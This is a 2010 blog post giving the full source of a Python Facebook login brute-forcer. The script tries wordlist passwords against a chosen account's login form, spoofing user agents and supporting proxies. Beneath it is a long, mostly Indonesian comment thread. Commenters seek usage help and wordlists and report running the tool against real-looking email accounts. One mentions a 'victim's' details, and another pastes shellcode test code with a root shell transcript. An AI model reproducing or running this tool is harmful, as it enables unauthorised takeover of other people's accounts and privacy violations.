fbruteforcer.py
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_ <yudha.gunslinger@gmail.com>
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username <username> | User for bruteforcing
-w, --wordlist <filename> | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy <host:port> | Set http proxy will be use
-k, --usernameproxy <username> | Set username at proxy will be use
-i, --passproxy <password> | Set password at proxy will be use
-l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
-h, --help <help> | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()

-0.789275
113.921327
Please share this folks !
Like this:
3 bloggers like this post.
This entry was posted on July 27, 2010 by gunslinger_. It was filed under Tools and was tagged with 'amaya/9.51 libwww/5.4.0', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Opera/8.00 (Windows NT 5.1; U; en)', about, account, ads, allow, amazing, application, asshole, atacker, attack, attempt, beware, bomber, bot, brandwein, brute, caution, china, click, comment, connections, cookielib, dangerous, darkc0de, database, db, developer, devilzc0de, dhcp, easy, echo, except, exploit, external, facebook, fool, forcer, freeze, friend, fun, funny, gathering, hack, hacked, hacker, hacking, how, icmp, idiot, in, indonesia, info, information, injector, internal, internet, its, jasakom, learn, legendary, leonard, linux, login, lunak, mechanize, missconfiguration, module, more, my, network, new, not, own, password, perangkat, post, programmer, project, pwned, python, robot, send, setting, show, simulation, socket, states, strategies, stupid, sunglasses, technique, time, to, Tools, united, unix, url, user, who, windows, works, written, you.
Leave a Reply
wew pertamax ini mah …..
kren di test ah
July 27, 2010 at 3:47 am
yep silahkan bro
July 27, 2010 at 4:05 am
ijin tes ye bang guns….
Headshoot
July 27, 2010 at 5:43 am
wew.. berhasil bro.. tp koq agak lama yak bwt bruteforcenya??..
July 27, 2010 at 7:33 am
wew
mantap ne bro….
July 27, 2010 at 9:08 am
Mas wordlistnya skalian di share dunk bang…
klo perlu yang bergiga2… wkw….
July 27, 2010 at 8:59 pm
gimana sih ngejalaninya ??? kita nulis email targetnya dimana terus wordlisnya diisi apa aja mas….please pertama kali belajar ni
July 30, 2010 at 2:40 pm
diisi wordlist password buat login yang di tes 1 persatu bro
July 31, 2010 at 6:12 am
untuk membatasi jarak per kata pakai koma atau cuma spasi…terus emailnya di tulis dimana kak…. maaf banyak nanya, pengen belajar
August 1, 2010 at 1:42 pm
harus pakai spasi sesudah opsi bro
August 2, 2010 at 5:19 am
tanya lagi bro gun………………gini kan aku dah jalankan aplikasi ini tapi kok keluar
“Please install mechanize python module first”
ini kenapa bro gun apa ada yang kurang dengan aplikasi pyton aku
August 1, 2010 at 9:29 pm
btw ente pake OS linux apa windows ? itu kurang module mechanize nya bro… untuk lebih lengkapnya google aja penjelasannya lebih detail…
August 2, 2010 at 5:21 am
bro guns, sy dah coba n berhasil bro.. tp koq bruteforce pake wordlistnya lama?? utk satu word, butuh waktu lama.. itu bs di-optimize??
August 2, 2010 at 12:44 pm
tergantung kecepatan internet cepat atau lambatnya
August 3, 2010 at 6:07 am
ane pake linux…….bro gun,,,,,,oke langsung menuju ke mbah google
August 2, 2010 at 8:33 pm
bro gun………..tanya lagi kok aku pke shell lainya kok gak isa jalan ya
=================================================================================
#include // standar input output library
char shellcode[] = “\x55\x89\xe5\x53\x83\xec\x04\xe8\x00\x00\x00\x00\x5b\x81\xc3\xdc\x1c\x00\x00\x8b”
“\x93\xfc\xff\xff\xff\x85\xd2\x74\x05\xe8\x1e\x00\x00\x00\xe8\xed\x00\x00\x00\xe8″
“\xc8\x01\x00\x00\x58\x5b\xc9\xc3\xff\x35\xf8\x9f\x04\x08\xff\x25\xfc\x9f\x04\x08″
“\x00\x00\xff\x25\x00\xa0\x04\x08\x68\x00\x00\x00\x00\xe9\xe0\xff\xff\xff\xff\x25″
“\x04\xa0\x04\x08\x68\x08\x00\x00\x00\xe9\xd0\xff\xff\xff\xff\x25\x08\xa0\x04\x08″
“\x68\x10\x00\x00\x00\xe9\xc0\xff\xff\xff\xff\x25\x0c\xa0\x04\x08\x68\x18\x00\x00″
“\x00\xe9\xb0\xff\xff\xff\x31\xed\x5e\x89\xe1\x83\xe4\xf0\x50\x54\x52\x68\x90\x84″
“\x04\x08\x68\xa0\x84\x04\x08\x51\x56\x68\x44\x84\x04\x08\xe8\xab\xff\xff\xff\xf4″
“\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5\x53\x83\xec”
“\x04\x80\x3d\x24\xa0\x04\x08\x75\x3f\xa1\x28\xa0\x04\x08\xbb\x18\x9f\x04\x08\x81″
“\xeb\x14\x9f\x04\x08\xc1\xfb\x02\x83\xeb\x01\x39\xd8\x73\x1e\x8d\xb6\x00\x00\x00″
“\x00\x83\xc0\x01\xa3\x28\xa0\x04\x08\xff\x14\x85\x14\x9f\x04\xa1\x28\xa0\x04\x08″
“\x39\xd8\x72\xe8\xc6\x05\x24\xa0\x04\x08\x83\xc4\x04\x5b\x5d\xc3\x8d\x74\x26\x00″
“\x8d\xbc\x27\x00\x00\x00\x55\x89\xe5\x83\xec\x18\xa1\x1c\x9f\x04\x08\x85\xc0\x74″
“\x12\xb8\x00\x00\x00\x00\x85\xc0\x74\x09\xc7\x04\x24\x1c\x9f\x04\xff\xd0\xc9\xc3″
“\x90\x55\x89\xe5\x83\xe4\xf0\x83\xec\x10\xa1\x18\xa0\x04\x08\x89\x04\x24\xe8\x12″
“\xff\xff\xff\x89\xc1\xba\x78\x85\x04\x08\xa1\x20\xa0\x04\x08\x89\x4c\x24\x08\x89″
“\x54\x24\x04\x89\x04\x24\xe8\x06\xff\xff\xff\xa1\x18\xa0\x04\x08\xff\xd0\xb8\x00″
“\x00\x00\x00\xc9\xc3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5″
“\x5d\xc3\x8d\x74\x26\x00\x8d\xbc\x27\x00\x00\x00\x55\x89\xe5\x57\x56\x53\xe8\x4f”
“\x00\x00\x00\x81\xc3\x49\x1b\x00\x00\x83\xec\x1c\xe8\x53\xfe\xff\xff\x8d\xbb\x18″
“\xff\xff\xff\x8d\x83\x18\xff\xff\xff\x29\xc7\xc1\xff\x02\x85\xff\x74\x24\x31\xf6″
“\x8b\x45\x10\x89\x44\x24\x08\x8b\x45\x0c\x89\x44\x24\x04\x8b\x45\x08\x89\x04\x24″
“\xff\x94\xb3\x18\xff\xff\x83\xc6\x01\x39\xfe\x72\xde\x83\xc4\x1c\x5b\x5e\x5f\x5d”
“\xc3\x8b\x1c\x24\xc3\x90\x90\x55\x89\xe5\x53\x83\xec\x04\xa1\x0c\x9f\x04\x08\x83″
“\xf8\xff\x74\x13\xbb\x0c\x9f\x04\x08\x66\x90\x83\xeb\x04\xff\xd0\x8b\x03\x83\xf8″
“\xff\x75\xf4\x83\xc4\x04\x5b\x5d\xc3\x90\x90\x55\x89\xe5\x53\x83\xec\x04\xe8\x00″
“\x00\x00\x00\x5b\x81\xc3\xbc\x1a\x00\x00\xe8\x7c\xfe\xff\xff\x59\x5b\xc9\xc3″;
int main(void)
{
fprintf(stdout,”Length: %d\n”,strlen(shellcode));
(*(void(*)()) shellcode)();
}
root@rendy-laptop:/home/rendy# ./shellcodetest
Length: 38
Segmentation fault
root@rendy-laptop:/home/rendy#
==============================================================================
hasilnya gitu gak mau jalan……………………….itu kan shell yang dibuat bro gun kan lo gak salah dari milw0rm…….
==============================================================================
root@rendy-laptop:/home/rendy# ./shell
Length: 39
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# umane
sh: umane: not found
# exit
==============================================================================
kalau yang ini mau ini semua aku ikutin dari artikel bro gun yang exploitasi buffer overlow III mohon pencerahannya bro gun
August 4, 2010 at 11:22 pm
bukan shellcode ane itu, banyak nullbytesnya pula
#include bukan #include aja
August 5, 2010 at 5:16 am
bang gun kok gak isa ya fbbruteforce…………..mesti yang salah wordlist nya……….itu gimana bro gun….
=================================================================================
=======================”Contoh tapi jangan dibajak ya teman2 hehehehhe==================
=================================================================================
rendy@rendy-laptop:~$ python fbbruteforce.py -u raa.lvodie@yahoo.co.id -w password
[*] Error: Check your wordlist path
=================================================================================
ini yang salah dimananya bro gun thanks…….maju terus brother gunslinger jangan mundur ntar nabrak tembok hehehhehee #PISS#
August 6, 2010 at 12:53 am
check path wordlistnya udah 1 folder belum bro ?
August 6, 2010 at 6:02 am
[*] Starting attack at 16:48:02
[*] Account for bruteforcing xxxx_xxx@hotmail.com
[*] Loaded : 67439 words
[*] Bruteforcing, please wait…
[*] Trying $… Traceback (most recent call last):
File “facebookbruteforcer.py”, line 243, in
main()
File “facebookbruteforcer.py”, line 237, in main
releaser()
File “facebookbruteforcer.py”, line 175, in releaser
bruteforce(word.replace(“\n”,”"))
File “facebookbruteforcer.py”, line 144, in bruteforce
opensite = br.open(fblogin)
File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 203, in open
File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 230, in _mech_open
File “build/bdist.linux-i686/egg/mechanize/_opener.py”, line 193, in open
File “build/bdist.linux-i686/egg/mechanize/_urllib2_fork.py”, line 344, in _open
File “build/bdist.linux-i686/egg/mechanize/_urllib2_fork.py”, line 332, in _call_chain
File “build/bdist.linux-i686/egg/mechanize/_urllib2_fork.py”, line 1170, in https_open
File “build/bdist.linux-i686/egg/mechanize/_urllib2_fork.py”, line 1118, in do_open
urllib2.URLError:
WTF bro
August 6, 2010 at 4:51 pm
its because your internet connections bro
August 7, 2010 at 9:38 am
my internet connection?? could you be more specific? my internet connection works just fine..
August 10, 2010 at 3:06 pm
maksudnya bagaimana bro gun……path wordlist……..maaf ane nubie abis masalah ginian hehehhehe
August 6, 2010 at 9:16 pm
directory wordlistnya usahain 1 folder
August 7, 2010 at 9:38 am
aku tau bro akhirnya………..tapi belum tau berhasil pa gak nich baru aku coba bro thanks dulu dah pokoknya hehehehhee
August 7, 2010 at 1:01 am
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ ‘_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\
bruteforcer…
Programmer : gunslinger_
Version : 1.0
[*] Starting attack at 13:12:05
[*] Account for bruteforcing raa.lvodie@yahoo.co.id
[*] Loaded : 2 words
[*] Bruteforcing, please wait…
[*] Trying password… rendy@rendy-laptop:~/fbbuferforce$
kok gak mau jalan ya bro gun………
August 7, 2010 at 1:14 am
itu udah jalan bro
August 7, 2010 at 9:42 am
nice share gun…
ijin coba, ini bisa jalan ga kalau di pasang di hosting?
maaf sya tnya itu, masih newbie ni bos..
August 7, 2010 at 6:49 am
ga bisa cuma buat di konsole gan
August 7, 2010 at 9:37 am
akang kok path wordlist tetep tidak ditemukan
padahal udah i folder
August 7, 2010 at 6:15 pm
oh… master punya yang pakai script php ga?
soalnya ane ga pakai linux..
August 8, 2010 at 12:43 am
gan kemarin ane udah post tapi kok ilang
kemaren nanya gini
kalo worldlistnya udah 1 folder tapi kok masih gak isa juga apanya gan
August 8, 2010 at 6:01 am
mana nich jawabna tak tunggu looo kak
August 9, 2010 at 8:43 am
yang lain bisa bro mungkin filenamenya ada yang kurang huruf ?
August 10, 2010 at 5:09 am
Stop hack the program!!!
August 14, 2010 at 12:16 pm
om, itu disimpan dengan nama dan format apa??
,trus apa aja yang diganti?? email, masukin kemana??
thanks sbelumnya.
August 18, 2010 at 8:00 am
dalam format python, harus install python dulu… jalanin aja ada pesan helpnya
August 19, 2010 at 11:23 am
Stop hack the program!!!
August 20, 2010 at 7:18 am
om….gw share di blog ane ya..
thanks b4
September 15, 2010 at 12:17 am
silahkan bro, terima kasih kembaliii
September 15, 2010 at 1:39 am
Keren bro,
ijin posting di blog ane ya :)
September 16, 2010 at 8:51 pm
cara makenya pake python 2.7 gmana sih bro masukinnya ke python shell ya
September 22, 2010 at 10:48 pm
aNE Buatin tutor lengkap’a dah.. ckckck
http://www.4shared.com/file/NwwkW3D2/Hack_FB.html
September 28, 2010 at 2:09 pm
i tested it and this works however due to captcha if the correct password in the wordlist is like in the middle of the list or like no more then 4-5 words down from the beginning of the list. it wont work. >_< sucks or is there another way around??
October 15, 2010 at 4:35 am
This time, facebook has using captcha for any login…
i will configure next source and configure how it’s works latter
Thanks,
guns
October 15, 2010 at 10:26 pm
new facebook robot
http://robotfb.com !
October 24, 2010 at 3:18 am
apa sudah ada yang bisa dapetin id+pswrd nya?????klo udah bsa rekues d email shiinttaa@yahoo.com
December 6, 2010 at 7:39 am
pening kali baah carany gmna seehh om….
February 23, 2011 at 10:45 pm
With all the doggone snow we have gotten recently I am stuck indoors, fortunately there is the internet, thanks for giving me something to do. :)
April 25, 2011 at 3:13 pm
You got numerous positive points there. I made a search on the issue and found nearly all peoples will agree with your blog.
April 28, 2011 at 3:24 am
Thanks for taking the time to talk about this, I feel fervently about this and I take pleasure in learning about this topic. Please, as you gain information, please update this blog with more information. I have found it very useful.
May 18, 2011 at 3:05 am
you’re welcome sir, and thanks to visit my blog. yes, i will update the blog more often. but i must do work too beside my experiment.
May 18, 2011 at 1:56 pm
Why this script doesn’t work?? :-S
May 31, 2011 at 9:52 pm
mas bro.. fbbruceforcer di running berjalan dgn sukses… pas nunggu hasil password muncul : “Facebook changing their system, please report bug at yudha.gunslinger@gmail.com” maksudnya apa ya mas bro.. thx
July 8, 2011 at 10:52 pm
Great script GS!! I dropped the victims info into rsmangler and got a mad wordlist now it’s only a matter of time muhahahahahahaha
July 13, 2011 at 9:27 am
My partner and I stumbled over here from a different website and thought I may as well check things out. I like what I see so now i am following you. Look forward to finding out about your web page for a second time.
July 25, 2011 at 11:29 am
Its such as you read my mind! You seem to know a lot approximately this, like you wrote the e book in it or something. I believe that you simply could do with a few p.c. to pressure the message house a little bit, however other than that, this is wonderful blog. An excellent read. I’ll certainly be back.
August 6, 2011 at 3:26 pm
What a very impressive writing! I am so glad I stumbled your article. Keep up the amazing work. Have a fantastic day!mail forwarder
August 14, 2011 at 2:43 pm
I have this error on Windows syntax error unexpected character after line
what should i do to resolve?
September 10, 2011 at 4:13 pm
maza999
Your comment is awaiting moderation.
[*] Starting attack at 08:03:51
[*] Account for bruteforcing *****@yahoo.com
[*] Loaded : 46 words
[*] Bruteforcing, please wait…
[*] Trying *****…
[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.
com
January 6, 2012 at 8:10 am
root@bt:~# python /root/Desktop/fb/fbbruteforcer.py
File “/root/Desktop/fb/fbbruteforcer.py”, line 114
elif arg.lower() == ‘-l’ or arg.lower() == ‘–log’:
^
IndentationError: unindent does not match any outer indentation level
muculnya ginian.. gmn cara atasinnya nih???
January 12, 2012 at 5:52 pm
mas bro.. maaf nih ane kurang ngerti.. jadi waktu ane coba jalankan ada eror di 008 # Date : Tue Jul 27 13:24:44 WIT 2010
^
SyntaxError: invalid token
January 27, 2012 at 2:56 am